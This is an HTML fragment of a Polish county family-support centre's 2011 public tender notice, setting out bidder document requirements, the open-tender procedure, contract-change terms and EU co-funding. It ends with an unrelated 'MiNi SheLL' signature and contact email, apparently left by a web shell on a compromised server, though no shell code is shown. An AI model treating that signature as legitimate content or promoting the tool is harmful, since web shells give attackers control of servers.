<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Wypełniony i podpisany Formularz ofertowy - załącznik nr 1 do SIWZ;
b)	Umowę spółki cywilnej - (jeśli dotyczy);
c)	Pełnomocnictwo - (jeśli dotyczy);
d)	Wzór oświadczenia o spełnieniu warunków udziału w postępowaniu - załącznik nr 2 oraz braku podstaw do wykluczenia - załącznik nr 3 i 3 a  do SIWZ.
e)	Wykaz osób - załącznik nr 4  do SIWZ.
f)	Wzór opisu ośrodka - wg załącznika nr 5 do SIWZ;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne postanowienia umowy zawarte są w załączniku   nr 6 do SIWZ.
2.	Zamawiający informuje, iż w treści zawartej umowy można wprowadzać następujące zmiany:
2.1.	zmiana cen w przypadku zmiany stawki podatku VAT (jeżeli dotyczy);
2.2.	zmiana danych teleadresowych Wykonawcy lub Zamawiającego;
2.3.	zmiana osób upoważnionych do dokonywania czynności prawnych;
3.	Zmiany określone w pkt 2 wymagają pisemnej akceptacji Zamawiającego.
4.	Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.
5.	Za zgodą zamawiającego dopuszczalna jest zmiana składu kadry Wykonawcy, przy czym zmiany te nie mogą prowadzić do pogorszenia poziomu kwalifikacji zmienionej kadry w stosunku do zaoferowanej w ofercie. W przypadku zmiany kadry, Wykonawca zobowiązany jest przedstawić kwalifikacje ww. osób. Zmiana kadry nie wymaga sporządzenia pisemnego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatzaganski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie, 68 - 100 Żagań, ul. Śląska 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2011 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie, 68 - 100 Żagań, ul. Śląska 1, 
pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Społecznego (EFS) w ramach Programu Operacyjnego Kapitał Ludzki (PO KL), Priorytet VII. Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji,, Poddziałanie 7.1.2 Rozwój  i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com